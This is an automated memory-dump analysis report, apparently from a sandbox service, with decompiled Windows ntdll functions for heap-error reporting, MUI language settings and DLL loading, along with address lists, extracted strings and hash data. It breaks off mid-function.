					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045FB150();
					} else {
						E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045FB150("Parameter3: %p\n",  *0x46e58ac);
				}
				_t119 =  *0x46e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045FB150();
					} else {
						E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x46e58b4);
					E045FB150("Last known valid blocks: before - %p, after - %p\n",  *0x46e58b0);
				} else {
					_t120 =  *0x46e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045FB150();
				} else {
					E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E045FB150("Stack trace available at %p\n", 0x46e58c0);
			}

0x046b1c10
0x046b1c16
0x046b1c1e
0x046b1c3d
0x046b1c3e
0x046b1c20
0x046b1c35
0x046b1c3a
0x046b1c44
0x046b1c55
0x046b1c5a
0x046b1c65
0x046b1c67
0x00000000
0x046b1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x046b1c67
0x046b1cdc
0x046b1ce5
0x046b1d04
0x046b1d05
0x046b1ce7
0x046b1cfc
0x046b1d01
0x046b1d0b
0x046b1d17
0x046b1d1f
0x046b1d25
0x046b1d30
0x046b1d4f
0x046b1d50
0x046b1d32
0x046b1d47
0x046b1d4c
0x046b1d61
0x046b1d67
0x046b1d68
0x046b1d6e
0x046b1d79
0x046b1d98
0x046b1d99
0x046b1d7b
0x046b1d90
0x046b1d95
0x046b1daa
0x046b1db0
0x046b1db1
0x046b1db7
0x046b1dc2
0x046b1de1
0x046b1de2
0x046b1dc4
0x046b1dd9
0x046b1dde
0x046b1df3
0x046b1df9
0x046b1dfa
0x046b1e00
0x046b1e0a
0x046b1e13
0x046b1e32
0x046b1e33
0x046b1e15
0x046b1e2a
0x046b1e2f
0x046b1e39
0x046b1e4a
0x046b1e02
0x046b1e02
0x046b1e08
0x00000000
0x00000000
0x046b1e08
0x046b1e5b
0x046b1e7a
0x046b1e7b
0x046b1e5d
0x046b1e72
0x046b1e77
0x046b1e95

Strings

heap_failure_generic, xrefs: 046B1C7C
Heap error detected at %p (heap handle %p), xrefs: 046B1C50
heap_failure_invalid_allocation_type, xrefs: 046B1CB4
heap_failure_entry_corruption, xrefs: 046B1C83
heap_failure_buffer_underrun, xrefs: 046B1C9F
Parameter1: %p, xrefs: 046B1D5C
heap_failure_invalid_argument, xrefs: 046B1CAD
Error code: %d - %s, xrefs: 046B1D12
heap_failure_multiple_entries_corruption, xrefs: 046B1C8A
Parameter3: %p, xrefs: 046B1DEE
heap_failure_cross_heap_operation, xrefs: 046B1CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 046B1CD7
heap_failure_internal, xrefs: 046B1C6E
heap_failure_listentry_corruption, xrefs: 046B1CD0
Last known valid blocks: before - %p, after - %p, xrefs: 046B1E45
heap_failure_virtual_block_corruption, xrefs: 046B1C91
heap_failure_usage_after_free, xrefs: 046B1CBB
Parameter2: %p, xrefs: 046B1DA5
heap_failure_block_not_busy, xrefs: 046B1CA6
heap_failure_freelists_corruption, xrefs: 046B1CC9
HEAP: , xrefs: 046B1C16, 046B1C3D, 046B1D04, 046B1D4F, 046B1D98, 046B1DE1, 046B1E32, 046B1E7A
heap_failure_unknown, xrefs: 046B1C75
heap_failure_buffer_overrun, xrefs: 046B1C98
Stack trace available at %p, xrefs: 046B1E86
HEAP[%wZ]: , xrefs: 046B1C30, 046B1CF7, 046B1D42, 046B1D8B, 046B1DD4, 046B1E25, 046B1E6D

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 7a0239871bc1c1d0a3b6d3cc4b9a6cd448cfb360b2c17368601b06c48000b637
Instruction ID: 728594efcfa7072dc2eadb497886897a673724504050ec2a139cb5b56d524402
Opcode Fuzzy Hash: 7a0239871bc1c1d0a3b6d3cc4b9a6cd448cfb360b2c17368601b06c48000b637
Instruction Fuzzy Hash: BC611932660151FFE3169785D855EB573E0FB01A74B09402AF54A5F301F728BC82EF4A

Uniqueness

Uniqueness Score: -1.00%

Function 04603D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04603D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04601B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04601B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04601B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04601B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04601B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04614620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0463F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04641370(_t276, 0x45d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0463BB40(0,  &_v68, _t170);
									if(L046043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0463BB40(_t257,  &_v68, _t243);
								if(L046043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04641370(_t278, 0x45d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04614620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0463F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04641370(_v16, 0x45d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0463BB40(_t262,  &_v68, _t244);
								if(L046043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04641370(_t282, 0x45d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0463BB40(_t262,  &_v68, _t201);
							if(L046043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04614620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0463F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04641370(_t280, 0x45d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0463BB40(_t267,  &_v68, _t245);
							if(L046043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04641370(_t284, 0x45d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0463BB40(_t267,  &_v68, _t224);
						if(L046043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04603d3c
0x04603d42
0x04603d44
0x04603d46
0x04603d49
0x04603d4c
0x04603d4f
0x04603d52
0x04603d55
0x04603d58
0x04603d5b
0x04603d5f
0x04603d61
0x04603d66
0x04658213
0x04658218
0x04604085
0x04604088
0x0460408e
0x04604094
0x0460409a
0x046040a0
0x046040a6
0x046040a9
0x046040af
0x046040b6
0x046040bd
0x046040bd
0x04603d83
0x0465821f
0x04658229
0x04658238
0x04658238
0x0465823d
0x0465823d
0x04603da0
0x04603daf
0x04603db5
0x04603dba
0x04603dba
0x04603dd4
0x04603e94
0x04603eab
0x04603f6d
0x04603f84
0x0460406b
0x0460406b
0x0460406e
0x0460406e
0x04604070
0x04604074
0x04658351
0x04658351
0x0460407a
0x0460407f
0x0465835d
0x04658370
0x04658377
0x04658379
0x0465837c
0x0465837c
0x0465835d
0x00000000
0x0460407f
0x04603f8a
0x04603f8d
0x04603f90
0x04603f95
0x0465830d
0x0465830f
0x04603f9b
0x04603fac
0x04603fae
0x04603fb1
0x04603fb1
0x04603fb6
0x04658317
0x0465831a
0x00000000
0x04603fbc
0x04603fc1
0x04603fc9
0x04603fd7
0x04603fda
0x04603fdd
0x04604021
0x04604021
0x04604029
0x04604030
0x04604044
0x04604046
0x04604046
0x04604044
0x04604049
0x04658327
0x04658334
0x04658339
0x0465833c
0x0460404f
0x0460404f
0x0460404f
0x04604051
0x04604056
0x04604063
0x04604063
0x04604068
0x00000000
0x04604068
0x04603fdf
0x04603fe2
0x04603fe4
0x04603fe7
0x04603fef
0x04604003
0x04604005
0x04604005
0x0460400c
0x04604013
0x04604016
0x04604017
0x0460401b
0x0460401e
0x00000000
0x0460401e
0x04603fb6
0x04603eb1
0x04603eb4
0x04603eb7
0x04603ebc
0x046582a9
0x046582ab
0x04603ec2
0x04603ed3
0x04603ed5
0x04603ed8
0x04603ed8
0x04603edd
0x046582b3
0x046582b6
0x00000000
0x04603ee3
0x04603ee8
0x04603eed
0x04603ef0
0x04603ef3
0x04603f02
0x04603f05
0x04603f08
0x046582c0
0x046582c3
0x046582c5
0x046582c8
0x046582d0
0x046582e4
0x046582e6
0x046582e6
0x046582ed
0x046582f4
0x046582f7
0x046582f8
0x046582fc
0x046582ff
0x046582ff
0x04603f0e
0x04603f11
0x04603f16
0x04603f1d
0x04603f31
0x04658307
0x04658307
0x04603f31
0x04603f39
0x04603f48
0x04603f4d
0x04603f50
0x04603f50
0x04603f53
0x04603f58
0x04603f65
0x04603f65
0x04603f6a
0x00000000
0x04603f6a
0x04603edd
0x04603dda
0x04603ddd
0x04603de0
0x04603de5
0x04658245
0x04603deb
0x04603df7
0x04603dfc
0x04603dfe
0x04603e01
0x04603e01
0x04603e06
0x0465824d
0x0465824f
0x04658254
0x00000000
0x04603e0c
0x04603e11
0x04603e16
0x04603e19
0x04603e29
0x04603e2c
0x04603e2f
0x0465825c
0x0465825f
0x04658261
0x04658264
0x0465826c
0x04658280
0x04658282
0x04658282
0x04658289
0x04658290
0x04658293
0x04658294
0x04658298
0x0465829b
0x0465829b
0x04603e35
0x04603e38
0x04603e3d
0x04603e44
0x04603e58
0x046582a3
0x046582a3
0x04603e58
0x04603e60
0x04603e6f
0x04603e74
0x04603e77
0x04603e77
0x04603e7a
0x04603e7f
0x04603e8c
0x04603e8c
0x04603e91
0x00000000
0x04603e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 04603E97
Kernel-MUI-Language-SKU, xrefs: 04603F70
Kernel-MUI-Language-Allowed, xrefs: 04603DC0
Kernel-MUI-Number-Allowed, xrefs: 04603D8C
WindowsExcludedProcs, xrefs: 04603D6F

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 75de93e024c2fe53da53cef31c7fdeb51f411d816927a108d94df5c7325d1045
Instruction ID: 2a37d40e393bceefbef77a923477962e35420eceb6b2f8889d642df97d6ae1f1
Opcode Fuzzy Hash: 75de93e024c2fe53da53cef31c7fdeb51f411d816927a108d94df5c7325d1045
Instruction Fuzzy Hash: 6EF12C72D00219EBDB15DF98C980AEFBBB9FF49750F14406AE905A7251FB70AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04628E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04628E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x46ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x46e8464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x46e5780 & 0x00000003) != 0) {
							E04675510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x46e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0463B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x46e7984; // 0x933ea0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x46e8464; // 0x76d30110
					 *0x46eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04629B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x46e5780 & 0x00000005) != 0) {
						_push(_t49);
						E04675510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04628e0f
0x04628e16
0x04628e19
0x04628e1b
0x04628e21
0x04628e7f
0x04628e85
0x04669354
0x0466936c
0x04669371
0x0466937b
0x04669381
0x04669381
0x0466937b
0x04628e9d
0x04628e9d
0x04628e29
0x04628e2c
0x04628e38
0x04628e3e
0x04628e43
0x04628eb5
0x04628eb9
0x046692aa
0x046692af
0x046692e8
0x046692e8
0x046692af
0x04628eb9
0x04628e45
0x04628e53
0x04628e5b
0x04628e5f
0x04628e78
0x04628e78
0x04628e7d
0x04628ec3
0x04628ecd
0x04628ed2
0x04628ed2
0x04628ec5
0x04628ec5
0x00000000
0x04628e7d
0x04628e67
0x04628ea4
0x0466931a
0x00000000
0x00000000
0x04669320
0x04628ea4
0x04628e70
0x04669325
0x04669340
0x04669345
0x04669345
0x04628e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 04669357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0466932A
minkernel\ntdll\ldrsnap.c, xrefs: 0466933B, 04669367
LdrpFindDllActivationContext, xrefs: 04669331, 0466935D

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 37ebbbdda2b2799ed224124cac8f151735bfd7e506ab97bffeae863f59a0ccd2
Instruction ID: e2bb3b20541c4b88d5f1926b2e9e120caf3c4e81cc59833ae995c2daa407d4fd
Opcode Fuzzy Hash: 37ebbbdda2b2799ed224124cac8f151735bfd7e506ab97bffeae863f59a0ccd2
Instruction Fuzzy Hash: 97411732A00B35BFDBB5BE188E49A3972A4FB60748F054369D9855B251F7707C80CF81

Uniqueness

Uniqueness Score: -1.00%

Function 04608794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04608794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0460934A() != 0) {
								_t159 = E0467A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x46e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04675510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x46e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0460849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04608999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04608999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x46e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x46e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04612280(_t92, 0x46e86cc);
															_t94 = E046C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E046261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x46e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04608A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x46e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x46e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0463F380(_t136, 0x45d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04612280(_t108, 0x46e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E046261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E046C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
